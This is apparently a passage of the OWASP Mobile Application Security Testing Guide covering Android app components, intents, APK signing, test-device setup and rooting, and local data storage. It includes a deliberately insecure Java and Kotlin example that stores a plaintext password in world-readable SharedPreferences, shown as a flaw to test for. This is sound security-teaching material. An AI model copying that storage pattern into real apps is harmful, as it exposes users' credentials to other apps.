The manifest file describes the app structure, its components (activities, services, content providers, and intent receivers), and requested permissions. It also contains general app metadata, such as the app's icon, version number, and theme. The file may list other information, such as compatible APIs (minimal, targeted, and maximal SDK version) and the kind of storage it can be installed on (external or internal).
Here is an example of a manifest file, including the package name (the convention is a reversed URL, but any string is acceptable). It also lists the app version, relevant SDKs, required permissions, exposed content providers, broadcast receivers used with intent filters and a description of the app and its activities:
<manifest\n package=\"com.owasp.myapplication\"\n android:versionCode=\"0.1\" >\n\n <uses-sdk android:minSdkVersion=\"12\"\n android:targetSdkVersion=\"22\"\n android:maxSdkVersion=\"25\" />\n\n <uses-permission android:name=\"android.permission.INTERNET\" />\n\n <provider\n android:name=\"com.owasp.myapplication.MyProvider\"\n android:exported=\"false\" />\n\n <receiver android:name=\".MyReceiver\" >\n <intent-filter>\n <action android:name=\"com.owasp.myapplication.myaction\" />\n </intent-filter>\n </receiver>\n\n <application\n android:icon=\"@drawable/ic_launcher\"\n android:label=\"@string/app_name\"\n android:theme=\"@style/Theme.Material.Light\" >\n <activity\n android:name=\"com.owasp.myapplication.MainActivity\" >\n <intent-filter>\n <action android:name=\"android.intent.action.MAIN\" />\n </intent-filter>\n </activity>\n </application>\n</manifest>\n
The full list of available manifest options is in the official Android Manifest file documentation.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#app-components","title":"App Components","text":"Android apps are made of several high-level components. The main components are:
All these elements are provided by the Android operating system, in the form of predefined classes available through APIs.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#activities","title":"Activities","text":"Activities make up the visible part of any app. There is one activity per screen, so an app with three different screens implements three different activities. Activities are declared by extending the Activity class. They contain all user interface elements: fragments, views, and layouts.
Each activity needs to be declared in the Android Manifest with the following syntax:
<activity android:name=\"ActivityName\">\n</activity>\n
Activities not declared in the manifest can't be displayed, and attempting to launch them will raise an exception.
Like apps, activities have their own life cycle and need to monitor system changes to handle them. Activities can be in the following states: active, paused, stopped, and inactive. These states are managed by the Android operating system. Accordingly, activities can implement the following event managers:
An app may not explicitly implement all event managers, in which case default actions are taken. Typically, at least the onCreate
manager is overridden by the app developers. This is how most user interface components are declared and initialized. onDestroy
may be overridden when resources (like network connections or connections to databases) must be explicitly released or specific actions must occur when the app shuts down.
A fragment represents a behavior or a portion of the user interface within the activity. Fragments were introduced Android with the version Honeycomb 3.0 (API level 11).
Fragments are meant to encapsulate parts of the interface to facilitate re-usability and adaptation to different screen sizes. Fragments are autonomous entities in that they include all their required components (they have their own layout, buttons, etc.). However, they must be integrated with activities to be useful: fragments can't exist on their own. They have their own life cycle, which is tied to the life cycle of the Activities that implement them.
Because fragments have their own life cycle, the Fragment class contains event managers that can be redefined and extended. These event managers included onAttach, onCreate, onStart, onDestroy and onDetach. Several others exist; the reader should refer to the Android Fragment specification for more details.
Fragments can be easily implemented by extending the Fragment class provided by Android:
Example in Java:
public class MyFragment extends Fragment {\n ...\n}\n
Example in Kotlin:
class MyFragment : Fragment() {\n ...\n}\n
Fragments don't need to be declared in manifest files because they depend on activities.
To manage its fragments, an activity can use a Fragment Manager (FragmentManager class). This class makes it easy to find, add, remove, and replace associated fragments.
Fragment Managers can be created via the following:
Example in Java:
FragmentManager fm = getFragmentManager();\n
Example in Kotlin:
var fm = fragmentManager\n
Fragments don't necessarily have a user interface; they can be a convenient and efficient way to manage background operations pertaining to the app's user interface. A fragment may be declared persistent so that if the system preserves its state even if its Activity is destroyed.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#content-providers","title":"Content Providers","text":"Android uses SQLite to store data permanently: as with Linux, data is stored in files. SQLite is a light, efficient, open source relational data storage technology that does not require much processing power, which makes it ideal for mobile use. An entire API with specific classes (Cursor, ContentValues, SQLiteOpenHelper, ContentProvider, ContentResolver, etc.) is available. SQLite is not run as a separate process; it is part of the app. By default, a database belonging to a given app is accessible to this app only. However, content providers offer a great mechanism for abstracting data sources (including databases and flat files); they also provide a standard and efficient mechanism to share data between apps, including native apps. To be accessible to other apps, a content provider needs to be explicitly declared in the manifest file of the app that will share it. As long as content providers aren't declared, they won't be exported and can only be called by the app that creates them.
Content providers are implemented through a URI addressing scheme: they all use the content:// model. Regardless of the type of sources (SQLite database, flat file, etc.), the addressing scheme is always the same, thereby abstracting the sources and offering the developer a unique scheme. Content providers offer all regular database operations: create, read, update, delete. That means that any app with proper rights in its manifest file can manipulate the data from other apps.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#services","title":"Services","text":"Services are Android OS components (based on the Service class) that perform tasks in the background (data processing, starting intents, and notifications, etc.) without presenting a user interface. Services are meant to run processes long-term. Their system priorities are lower than those of active apps and higher than those of inactive apps. Therefore, they are less likely to be killed when the system needs resources, and they can be configured to automatically restart when enough resources become available. This makes services a great candidate for running background tasks. Please note that Services, like Activities, are executed in the main app thread. A service does not create its own thread and does not run in a separate process unless you specify otherwise.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#inter-process-communication","title":"Inter-Process Communication","text":"As we've already learned, every Android process has its own sandboxed address space. Inter-process communication facilities allow apps to exchange signals and data securely. Instead of relying on the default Linux IPC facilities, Android's IPC is based on Binder, a custom implementation of OpenBinder. Most Android system services and all high-level IPC services depend on Binder.
The term Binder stands for a lot of different things, including:
The Binder framework includes a client-server communication model. To use IPC, apps call IPC methods in proxy objects. The proxy objects transparently marshall the call parameters into a parcel and send a transaction to the Binder server, which is implemented as a character driver (/dev/binder). The server holds a thread pool for handling incoming requests and delivers messages to the destination object. From the perspective of the client app, all of this seems like a regular method call, all the heavy lifting is done by the Binder framework.
Services that allow other applications to bind to them are called bound services. These services must provide an IBinder interface to clients. Developers use the Android Interface Descriptor Language (AIDL) to write interfaces for remote services.
ServiceManager is a system daemon that manages the registration and lookup of system services. It maintains a list of name/Binder pairs for all registered services. Services are added with addService
and retrieved by name with the static getService
method in android.os.ServiceManager
:
Example in Java:
public static IBinder getService(String name) {\n try {\n IBinder service = sCache.get(name);\n if (service != null) {\n return service;\n } else {\n return getIServiceManager().getService(name);\n }\n } catch (RemoteException e) {\n Log.e(TAG, \"error in getService\", e);\n }\n return null;\n }\n
Example in Kotlin:
companion object {\n private val sCache: Map<String, IBinder> = ArrayMap()\n fun getService(name: String): IBinder? {\n try {\n val service = sCache[name]\n return service ?: getIServiceManager().getService(name)\n } catch (e: RemoteException) {\n Log.e(FragmentActivity.TAG, \"error in getService\", e)\n }\n return null\n }\n }\n
You can query the list of system services with the service list
command.
$ adb shell service list\nFound 99 services:\n0 carrier_config: [com.android.internal.telephony.ICarrierConfigLoader]\n1 phone: [com.android.internal.telephony.ITelephony]\n2 isms: [com.android.internal.telephony.ISms]\n3 iphonesubinfo: [com.android.internal.telephony.IPhoneSubInfo]\n
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#intents","title":"Intents","text":"Intent messaging is an asynchronous communication framework built on top of Binder. This framework allows both point-to-point and publish-subscribe messaging. An Intent is a messaging object that can be used to request an action from another app component. Although intents facilitate inter-component communication in several ways, there are three fundamental use cases:
startActivity
. The intent describes the activity and carries necessary data.sendBroadcast
or sendOrderedBroadcast
.There are two types of intents. Explicit intents name the component that will be started (the fully qualified class name). For instance:
Example in Java:
Intent intent = new Intent(this, myActivity.myClass);\n
Example in Kotlin:
var intent = Intent(this, myActivity.myClass)\n
Implicit intents are sent to the OS to perform a given action on a given set of data (The URL of the OWASP website in our example below). It is up to the system to decide which app or class will perform the corresponding service. For instance:
Example in Java:
Intent intent = new Intent(Intent.MY_ACTION, Uri.parse(\"https://www.owasp.org\"));\n
Example in Kotlin:
var intent = Intent(Intent.MY_ACTION, Uri.parse(\"https://www.owasp.org\"))\n
An intent filter is an expression in Android Manifest files that specifies the type of intents the component would like to receive. For instance, by declaring an intent filter for an activity, you make it possible for other apps to directly start your activity with a certain kind of intent. Likewise, your activity can only be started with an explicit intent if you don't declare any intent filters for it.
Android uses intents to broadcast messages to apps (such as an incoming call or SMS) important power supply information (low battery, for example), and network changes (loss of connection, for instance). Extra data may be added to intents (through putExtra
/getExtras
).
Here is a short list of intents sent by the operating system. All constants are defined in the Intent class, and the whole list is in the official Android documentation:
To improve security and privacy, a Local Broadcast Manager is used to send and receive intents within an app without having them sent to the rest of the operating system. This is very useful for ensuring that sensitive and private data don't leave the app perimeter (geolocation data for instance).
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#broadcast-receivers","title":"Broadcast Receivers","text":"Broadcast Receivers are components that allow apps to receive notifications from other apps and from the system itself. With them, apps can react to events (internal, initiated by other apps, or initiated by the operating system). They are generally used to update user interfaces, start services, update content, and create user notifications.
There are two ways to make a Broadcast Receiver known to the system. One way is to declare it in the Android Manifest file. The manifest should specify an association between the Broadcast Receiver and an intent filter to indicate the actions the receiver is meant to listen for.
An example Broadcast Receiver declaration with an intent filter in a manifest:
<receiver android:name=\".MyReceiver\" >\n <intent-filter>\n <action android:name=\"com.owasp.myapplication.MY_ACTION\" />\n </intent-filter>\n</receiver>\n
Please note that in this example, the Broadcast Receiver does not include the android:exported
attribute. As at least one filter was defined, the default value will be set to \"true\". In absence of any filters, it will be set to \"false\".
The other way is to create the receiver dynamically in code. The receiver can then register with the method Context.registerReceiver
.
An example of registering a Broadcast Receiver dynamically:
Example in Java:
// Define a broadcast receiver\nBroadcastReceiver myReceiver = new BroadcastReceiver() {\n @Override\n public void onReceive(Context context, Intent intent) {\n Log.d(TAG, \"Intent received by myReceiver\");\n }\n};\n// Define an intent filter with actions that the broadcast receiver listens for\nIntentFilter intentFilter = new IntentFilter();\nintentFilter.addAction(\"com.owasp.myapplication.MY_ACTION\");\n// To register the broadcast receiver\nregisterReceiver(myReceiver, intentFilter);\n// To un-register the broadcast receiver\nunregisterReceiver(myReceiver);\n
Example in Kotlin:
// Define a broadcast receiver\nval myReceiver: BroadcastReceiver = object : BroadcastReceiver() {\n override fun onReceive(context: Context, intent: Intent) {\n Log.d(FragmentActivity.TAG, \"Intent received by myReceiver\")\n }\n}\n// Define an intent filter with actions that the broadcast receiver listens for\nval intentFilter = IntentFilter()\nintentFilter.addAction(\"com.owasp.myapplication.MY_ACTION\")\n// To register the broadcast receiver\nregisterReceiver(myReceiver, intentFilter)\n// To un-register the broadcast receiver\nunregisterReceiver(myReceiver)\n
Note that the system starts an app with the registered receiver automatically when a relevant intent is raised.
According to Broadcasts Overview, a broadcast is considered \"implicit\" if it does not target an app specifically. After receiving an implicit broadcast, Android will list all apps that have registered a given action in their filters. If more than one app has registered for the same action, Android will prompt the user to select from the list of available apps.
An interesting feature of Broadcast Receivers is that they can be prioritized; this way, an intent will be delivered to all authorized receivers according to their priority. A priority can be assigned to an intent filter in the manifest via the android:priority
attribute as well as programmatically via the IntentFilter.setPriority
method. However, note that receivers with the same priority will be run in an arbitrary order.
If your app is not supposed to send broadcasts across apps, use a Local Broadcast Manager (LocalBroadcastManager
). They can be used to make sure intents are received from the internal app only, and any intent from any other app will be discarded. This is very useful for improving security and the efficiency of the app, as no interprocess communication is involved. However, please note that the LocalBroadcastManager
class is deprecated and Google recommends using alternatives such as LiveData
.
For more security considerations regarding Broadcast Receiver, see Security Considerations and Best Practices.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#implicit-broadcast-receiver-limitation","title":"Implicit Broadcast Receiver Limitation","text":"According to Background Optimizations, apps targeting Android 7.0 (API level 24) or higher no longer receive CONNECTIVITY_ACTION
broadcast unless they register their Broadcast Receivers with Context.registerReceiver()
. The system does not send ACTION_NEW_PICTURE
and ACTION_NEW_VIDEO
broadcasts as well.
According to Background Execution Limits, apps that target Android 8.0 (API level 26) or higher can no longer register Broadcast Receivers for implicit broadcasts in their manifest, except for those listed in Implicit Broadcast Exceptions. The Broadcast Receivers created at runtime by calling Context.registerReceiver
are not affected by this limitation.
According to Changes to System Broadcasts, beginning with Android 9 (API level 28), the NETWORK_STATE_CHANGED_ACTION
broadcast doesn't receive information about the user's location or personally identifiable data.
Once an app has been successfully developed, the next step is to publish and share it with others. However, apps can't simply be added to a store and shared, they must be first signed. The cryptographic signature serves as a verifiable mark placed by the developer of the app. It identifies the app\u2019s author and ensures that the app has not been modified since its initial distribution.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#signing-process","title":"Signing Process","text":"During development, apps are signed with an automatically generated certificate. This certificate is inherently insecure and is for debugging only. Most stores don't accept this kind of certificate for publishing; therefore, a certificate with more secure features must be created. When an application is installed on the Android device, the Package Manager ensures that it has been signed with the certificate included in the corresponding APK. If the certificate's public key matches the key used to sign any other APK on the device, the new APK may share a UID with the pre-existing APK. This facilitates interactions between applications from a single vendor. Alternatively, specifying security permissions for the Signature protection level is possible; this will restrict access to applications that have been signed with the same key.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#apk-signing-schemes","title":"APK Signing Schemes","text":"Android supports three application signing schemes. Starting with Android 9 (API level 28), APKs can be verified with APK Signature Scheme v3 (v3 scheme), APK Signature Scheme v2 (v2 scheme) or JAR signing (v1 scheme). For Android 7.0 (API level 24) and above, APKs can be verified with the APK Signature Scheme v2 (v2 scheme) or JAR signing (v1 scheme). For backwards compatibility, an APK can be signed with multiple signature schemes in order to make the app run on both newer and older SDK versions. Older platforms ignore v2 signatures and verify v1 signatures only.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#jar-signing-v1-scheme","title":"JAR Signing (v1 Scheme)","text":"The original version of app signing implements the signed APK as a standard signed JAR, which must contain all the entries in META-INF/MANIFEST.MF
. All files must be signed with a common certificate. This scheme does not protect some parts of the APK, such as ZIP metadata. The drawback of this scheme is that the APK verifier needs to process untrusted data structures before applying the signature, and the verifier discards data the data structures don't cover. Also, the APK verifier must decompress all compressed files, which takes considerable time and memory.
With the APK signature scheme, the complete APK is hashed and signed, and an APK Signing Block is created and inserted into the APK. During validation, the v2 scheme checks the signatures of the entire APK file. This form of APK verification is faster and offers more comprehensive protection against modification. You can see the APK signature verification process for v2 Scheme below.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#apk-signature-scheme-v3-scheme","title":"APK Signature Scheme (v3 Scheme)","text":"The v3 APK Signing Block format is the same as v2. V3 adds information about the supported SDK versions and a proof-of-rotation struct to the APK signing block. In Android 9 (API level 28) and higher, APKs can be verified according to APK Signature Scheme v3, v2 or v1 scheme. Older platforms ignore v3 signatures and try to verify v2 then v1 signature.
The proof-of-rotation attribute in the signed-data of the signing block consists of a singly-linked list, with each node containing a signing certificate used to sign previous versions of the app. To make backward compatibility work, the old signing certificates sign the new set of certificates, thus providing each new key with evidence that it should be as trusted as the older key(s). It is no longer possible to sign APKs independently, because the proof-of-rotation structure must have the old signing certificates signing the new set of certificates, rather than signing them one-by-one. You can see the APK signature v3 scheme verification process below.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#apk-signature-scheme-v4-scheme","title":"APK Signature Scheme (v4 Scheme)","text":"The APK Signature Scheme v4 was introduced along with Android 11 (API level 30) and requires all devices launched with Android 11 and up to have fs-verity enabled by default. fs-verity is a Linux kernel feature that is primarily used for file authentication (detection of malicious modifications) due to its extremely efficient file hash calculation. Read requests only will succeed if the content verifies against trusted digital certificates that were loaded to the kernel keyring during boot time.
The v4 signature requires a complementary v2 or v3 signature and in contrast to previous signature schemes, the v4 signature is stored in a separate file <apk name>.apk.idsig
. Remember to specify it using the --v4-signature-file
flag when verifying a v4-signed APK with apksigner verify
.
You can find more detailed information in the Android developer documentation.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#creating-your-certificate","title":"Creating Your Certificate","text":"Android uses public/private certificates to sign Android apps (.apk files). Certificates are bundles of information; in terms of security, keys are the most important part of that bundle. Public certificates contain users' public keys, and private certificates contain users' private keys. Public and private certificates are linked. Certificates are unique and can't be re-generated. Note that if a certificate is lost, it cannot be recovered, so updating any apps signed with that certificate becomes impossible. App creators can either reuse an existing private/public key pair that is in an available KeyStore or generate a new pair. In the Android SDK, a new key pair is generated with the keytool
command. The following command creates a RSA key pair with a key length of 2048 bits and an expiry time of 7300 days = 20 years. The generated key pair is stored in the file 'myKeyStore.jks', which is in the current directory:
keytool -genkey -alias myDomain -keyalg RSA -keysize 2048 -validity 7300 -keystore myKeyStore.jks -storepass myStrongPassword\n
Safely storing your secret key and making sure it remains secret during its entire life cycle is of paramount importance. Anyone who gains access to the key will be able to publish updates to your apps with content that you don't control (thereby adding insecure features or accessing shared content with signature-based permissions). The trust that a user places in an app and its developers is based totally on such certificates; certificate protection and secure management are therefore vital for reputation and customer retention, and secret keys must never be shared with other individuals. Keys are stored in a binary file that can be protected with a password; such files are referred to as KeyStores. KeyStore passwords should be strong and known only to the key creator. For this reason, keys are usually stored on a dedicated build machine that developers have limited access to. An Android certificate must have a validity period that's longer than that of the associated app (including updated versions of the app). For example, Google Play will require certificates to remain valid until Oct 22nd, 2033 at least.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#signing-an-application","title":"Signing an Application","text":"The goal of the signing process is to associate the app file (.apk) with the developer's public key. To achieve this, the developer calculates a hash of the APK file and encrypts it with their own private key. Third parties can then verify the app's authenticity (e.g., the fact that the app really comes from the user who claims to be the originator) by decrypting the encrypted hash with the author\u2019s public key and verifying that it matches the actual hash of the APK file.
Many Integrated Development Environments (IDE) integrate the app signing process to make it easier for the user. Be aware that some IDEs store private keys in clear text in configuration files; double-check this in case others are able to access such files and remove the information if necessary. Apps can be signed from the command line with the 'apksigner' tool provided by the Android SDK (API level 24 and higher). It is located at [SDK-Path]/build-tools/[version]
. For API 24.0.2 and below, you can use 'jarsigner', which is part of the Java JDK. Details about the whole process can be found in official Android documentation; however, an example is given below to illustrate the point.
apksigner sign --out mySignedApp.apk --ks myKeyStore.jks myUnsignedApp.apk\n
In this example, an unsigned app ('myUnsignedApp.apk') will be signed with a private key from the developer KeyStore 'myKeyStore.jks' (located in the current directory). The app will become a signed app called 'mySignedApp.apk' and will be ready to release to stores.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#zipalign","title":"Zipalign","text":"The zipalign
tool should always be used to align the APK file before distribution. This tool aligns all uncompressed data (such as images, raw files, and 4-byte boundaries) within the APK, which helps improve memory management during app runtime.
Zipalign must be used before the APK file is signed with apksigner.
"},{"location":"MASTG/Android/0x05a-Platform-Overview/#publishing-process","title":"Publishing Process","text":"Distributing apps from anywhere (your own site, any store, etc.) is possible because the Android ecosystem is open. However, Google Play is the most well-known, trusted, and popular store, and Google itself provides it. Amazon Appstore is the trusted default store for Kindle devices. If users want to install third-party apps from a non-trusted source, they must explicitly allow this with their device security settings.
Apps can be installed on an Android device from a variety of sources: locally via USB, via Google's official app store (Google Play Store) or from alternative stores.
Whereas other vendors may review and approve apps before they are actually published, Google will simply scan for known malware signatures; this minimizes the time between the beginning of the publishing process and public app availability.
Publishing an app is quite straightforward; the main operation is making the signed APK file downloadable. On Google Play, publishing starts with account creation and is followed by app delivery through a dedicated interface. Details are available at the official Android documentation.
"},{"location":"MASTG/Android/0x05b-Android-Security-Testing/","title":"Android Security Testing","text":"In this chapter, we'll dive into setting up a security testing environment and introduce you to some practical processes and techniques for testing the security of Android apps. These are the building blocks for the MASTG test cases.
"},{"location":"MASTG/Android/0x05b-Android-Security-Testing/#android-testing-setup","title":"Android Testing Setup","text":"You can set up a fully functioning test environment on almost any machine running Windows, Linux, or macOS.
"},{"location":"MASTG/Android/0x05b-Android-Security-Testing/#host-device","title":"Host Device","text":"At the very least, you'll need Android Studio (which comes with the Android SDK) platform tools, an emulator, and an app to manage the various SDK versions and framework components. Android Studio also comes with an Android Virtual Device (AVD) Manager application for creating emulator images. Make sure that the newest SDK tools and platform tools packages are installed on your system.
In addition, you may want to complete your host setup by installing the Android NDK if you're planning to work with apps containing native libraries.
Sometimes it can be useful to display or control devices from the computer. To achieve this, you can use Scrcpy.
"},{"location":"MASTG/Android/0x05b-Android-Security-Testing/#testing-device","title":"Testing Device","text":"For dynamic analysis, you'll need an Android device to run the target app on. In principle, you can test without a real Android device and use only the emulator. However, apps execute quite slowly on a emulator, and simulators may not give realistic results. Testing on a real device makes for a smoother process and a more realistic environment. On the other hand, emulators allow you to easily change SDK versions or create multiple devices. A full overview of the pros and cons of each approach is listed in the table below.
Property Physical Emulator/Simulator Ability to restore Softbricks are always possible, but new firmware can typically still be flashed. Hardbricks are very rare. Emulators can crash or become corrupt, but a new one can be created or a snapshot can be restored. Reset Can be restored to factory settings or reflashed. Emulators can be deleted and recreated. Snapshots Not possible. Supported, great for malware analysis. Speed Much faster than emulators. Typically slow, but improvements are being made. Cost Typically start at $200 for a usable device. You may require different devices, such as one with or without a biometric sensor. Both free and commercial solutions exist. Ease of rooting Highly dependent on the device. Typically rooted by default. Ease of emulator detection It's not an emulator, so emulator checks are not applicable. Many artefacts will exist, making it easy to detect that the app is running in an emulator. Ease of root detection Easier to hide root, as many root detection algorithms check for emulator properties. With Magisk Systemless root it's nearly impossible to detect. Emulators will almost always trigger root detection algorithms due to the fact that they are built for testing with many artefacts that can be found. Hardware interaction Easy interaction through Bluetooth, NFC, 4G, Wi-Fi, biometrics, camera, GPS, gyroscope, ... Usually fairly limited, with emulated hardware input (e.g. random GPS coordinates) API level support Depends on the device and the community. Active communities will keep distributing updated versions (e.g. LineageOS), while less popular devices may only receive a few updates. Switching between versions requires flashing the device, a tedious process. Always supports the latest versions, including beta releases. Emulators containing specific API levels can easily be downloaded and launched. Native library support Native libraries are usually built for ARM devices, so they will work on a physical device. Some emulators run on x86 CPUs, so they may not be able to run packaged native libraries. Malware danger Malware samples can infect a device, but if you can clear out the device storage and flash a clean firmware, thereby restoring it to factory settings, this should not be a problem. Be aware that there are malware samples that try to exploit the USB bridge. Malware samples can infect an emulator, but the emulator can simply be removed and recreated. It is also possible to create snapshots and compare different snapshots to help in malware analysis. Be aware that there are malware proofs of concept which try to attack the hypervisor."},{"location":"MASTG/Android/0x05b-Android-Security-Testing/#testing-on-a-real-device","title":"Testing on a Real Device","text":"Almost any physical device can be used for testing, but there are a few considerations to be made. First, the device needs to be rootable. This is typically either done through an exploit, or through an unlocked bootloader. Exploits are not always available, and the bootloader may be locked permanently, or it may only be unlocked once the carrier contract has been terminated.
The best candidates are flagship Google pixel devices built for developers. These devices typically come with an unlockable bootloader, opensource firmware, kernel, radio available online and official OS source code. The developer communities prefer Google devices as the OS is closest to the android open source project. These devices generally have the longest support windows with 2 years of OS updates and 1 year of security updates after that.
Alternatively, Google's Android One project contains devices that will receive the same support windows (2 years of OS updates, 1 year of security updates) and have near-stock experiences. While it was originally started as a project for low-end devices, the program has evolved to include mid-range and high-end smartphones, many of which are actively supported by the modding community.
Devices that are supported by the LineageOS project are also very good candidates for test devices. They have an active community, easy to follow flashing and rooting instructions and the latest Android versions are typically quickly available as a Lineage installation. LineageOS also continues support for new Android versions long after the OEM has stopped distributing updates.
When working with an Android physical device, you'll want to enable Developer Mode and USB debugging on the device in order to use the ADB debugging interface. Since Android 4.2 (API level 16), the Developer options sub menu in the Settings app is hidden by default. To activate it, tap the Build number section of the About phone view seven times. Note that the build number field's location varies slightly by device. For example, on LG Phones, it is under About phone -> Software information. Once you have done this, Developer options will be shown at bottom of the Settings menu. Once developer options are activated, you can enable debugging with the USB debugging switch.
"},{"location":"MASTG/Android/0x05b-Android-Security-Testing/#testing-on-an-emulator","title":"Testing on an Emulator","text":"Multiple emulators exist, once again with their own strengths and weaknesses:
Free emulators:
Commercial emulators:
Although there exist several free Android emulators, we recommend using AVD as it provides enhanced features appropriate for testing your app compared to the others. In the remainder of this guide, we will use the official AVD to perform tests.
AVD supports some hardware emulation, such as GPS or SMS through its so-called Extended Controls as well as motion sensors.
You can either start an Android Virtual Device (AVD) by using the AVD Manager in Android Studio or start the AVD manager from the command line with the android
command, which is found in the tools directory of the Android SDK:
./android avd\n
Several tools and VMs that can be used to test an app within an emulator environment are available:
Please also verify the \"Testing Tools\" chapter at the end of this book.
"},{"location":"MASTG/Android/0x05b-Android-Security-Testing/#getting-privileged-access","title":"Getting Privileged Access","text":"Rooting (i.e., modifying the OS so that you can run commands as the root user) is recommended for testing on a real device. This gives you full control over the operating system and allows you to bypass restrictions such as app sandboxing. These privileges in turn allow you to use techniques like code injection and function hooking more easily.
Note that rooting is risky, and three main consequences need to be clarified before you proceed. Rooting can have the following negative effects:
You should not root a personal device that you store your private information on. We recommend getting a cheap, dedicated test device instead. Many older devices, such as Google's Nexus series, can run the newest Android versions and are perfectly fine for testing.
You need to understand that rooting your device is ultimately YOUR decision and that OWASP shall in no way be held responsible for any damage. If you're uncertain, seek expert advice before starting the rooting process.
"},{"location":"MASTG/Android/0x05b-Android-Security-Testing/#which-mobiles-can-be-rooted","title":"Which Mobiles Can Be Rooted","text":"Virtually any Android mobile can be rooted. Commercial versions of Android OS (which are Linux OS evolutions at the kernel level) are optimized for the mobile world. Some features have been removed or disabled for these versions, for example, non-privileged users' ability to become the 'root' user (who has elevated privileges). Rooting a phone means allowing users to become the root user, e.g., adding a standard Linux executable called su
, which is used to change to another user account.
To root a mobile device, first unlock its boot loader. The unlocking procedure depends on the device manufacturer. However, for practical reasons, rooting some mobile devices is more popular than rooting others, particularly when it comes to security testing: devices created by Google and manufactured by companies like Samsung, LG, and Motorola are among the most popular, particularly because they are used by many developers. The device warranty is not nullified when the boot loader is unlocked and Google provides many tools to support the root itself.
"},{"location":"MASTG/Android/0x05b-Android-Security-Testing/#rooting-with-magisk","title":"Rooting with Magisk","text":"Magisk (\"Magic Mask\") is one way to root your Android device. Its specialty lies in the way the modifications on the system are performed. While other rooting tools alter the actual data on the system partition, Magisk does not (which is called \"systemless\"). This enables a way to hide the modifications from root-sensitive applications (e.g. for banking or games) and allows using the official Android OTA upgrades without the need to unroot the device beforehand.
You can get familiar with Magisk reading the official documentation on GitHub. If you don't have Magisk installed, you can find installation instructions in the documentation. If you use an official Android version and plan to upgrade it, Magisk provides a tutorial on GitHub.
Furthermore, developers can use the power of Magisk to create custom modules and submit them to the official Magisk Modules repository. Submitted modules can then be installed inside the Magisk Manager application. One of these installable modules is a systemless version of the famous Xposed Framework (available for SDK versions up to 27).
"},{"location":"MASTG/Android/0x05b-Android-Security-Testing/#root-detection","title":"Root Detection","text":"An extensive list of root detection methods is presented in the \"Testing Anti-Reversing Defenses on Android\" chapter.
For a typical mobile app security build, you'll usually want to test a debug build with root detection disabled. If such a build is not available for testing, you can disable root detection in a variety of ways that will be introduced later in this book.
"},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/","title":"Android Data Storage","text":""},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/#overview","title":"Overview","text":"This chapter discusses the importance of securing sensitive data, like authentication tokens and private information, vital for mobile security. We'll look at Android's APIs for local data storage and share best practices.
While it's preferable to limit sensitive data on local storage, or avoid it at all whenever possible, practical use cases often necessitate user data storage. For example, to improve user experience, apps cache authentication tokens locally, circumventing the need for complex password entry at each app start. Apps may also need to store personally identifiable information (PII) and other sensitive data.
Sensitive data can become vulnerable if improperly protected, potentially stored in various locations, including the device or an external SD card. It's important to identify the information processed by the mobile app and classify what counts as sensitive data. Check out the \"Identifying Sensitive Data\" section in the \"Mobile App Security Testing\" chapter for data classification details. Refer to Security Tips for Storing Data in the Android developer's guide for comprehensive insights.
Sensitive information disclosure risks include potential information decryption, social engineering attacks (if PII is disclosed), account hijacking (if session information or an authentication token is disclosed), and app exploitation with a payment option.
In addition to data protection, validate and sanitize data from any storage source. This includes checking correct data types and implementing cryptographic controls, such as HMACs, for data integrity.
Android offers various data storage methods, tailored to users, developers, and applications. Common persistent storage techniques include:
Additionally, other Android functions that can result in data storage and should be tested include:
Understanding each relevant data storage function is crucial for performing the appropriate test cases. This overview provides a brief outline of these data storage methods and points testers to further relevant documentation.
"},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/#shared-preferences","title":"Shared Preferences","text":"The SharedPreferences API is commonly used to permanently save small collections of key-value pairs. Data stored in a SharedPreferences object is written to a plain-text XML file. The SharedPreferences object can be declared world-readable (accessible to all apps) or private. Misuse of the SharedPreferences API can often lead to exposure of sensitive data. Consider the following example:
Example for Java:
SharedPreferences sharedPref = getSharedPreferences(\"key\", MODE_WORLD_READABLE);\nSharedPreferences.Editor editor = sharedPref.edit();\neditor.putString(\"username\", \"administrator\");\neditor.putString(\"password\", \"supersecret\");\neditor.commit();\n
Example for Kotlin:
var sharedPref = getSharedPreferences(\"key\", Context.MODE_WORLD_READABLE)\nvar editor = sharedPref.edit()\neditor.putString(\"username\", \"administrator\")\neditor.putString(\"password\", \"supersecret\")\neditor.commit()\n
Once the activity has been called, the file key.xml will be created with the provided data. This code violates several best practices.
/data/data/<package-name>/shared_prefs/key.xml
.<?xml version='1.0' encoding='utf-8' standalone='yes' ?>\n<map>\n <string name=\"username\">administrator</string>\n <string name=\"password\">supersecret</string>\n</map>\n
MODE_WORLD_READABLE
allows all applications to access and read the contents of key.xml
.root@hermes:/data/data/sg.vp.owasp_mobile.myfirstapp/shared_prefs # ls -la\n-rw-rw-r-- u0_a118 170 2016-04-23 16:51 key.xml\n
Please note that MODE_WORLD_READABLE
and MODE_WORLD_WRITEABLE
were deprecated starting on API level 17. Although newer devices may not be affected by this, applications compiled with an android:targetSdkVersion
value less than 17 may be affected if they run on an OS version that was released before Android 4.2 (API level 17).
The Android platform provides a number of database options as aforementioned in the previous list. Each database option has its own quirks and methods that need to be understood.
"},{"location":"MASTG/Android/0x05d-Testing-Data-Storage/#sqlite-database-unencrypted","title":"SQLite Database (Unencrypted)","text":"SQLite is an SQL database engine that stores data in .db
files. The Android SDK has built-in support for SQLite databases. The main package used to manage the databases is android.database.sqlite
. For example, you may use the following code to store sensitive information within an activity:
Example in Java:
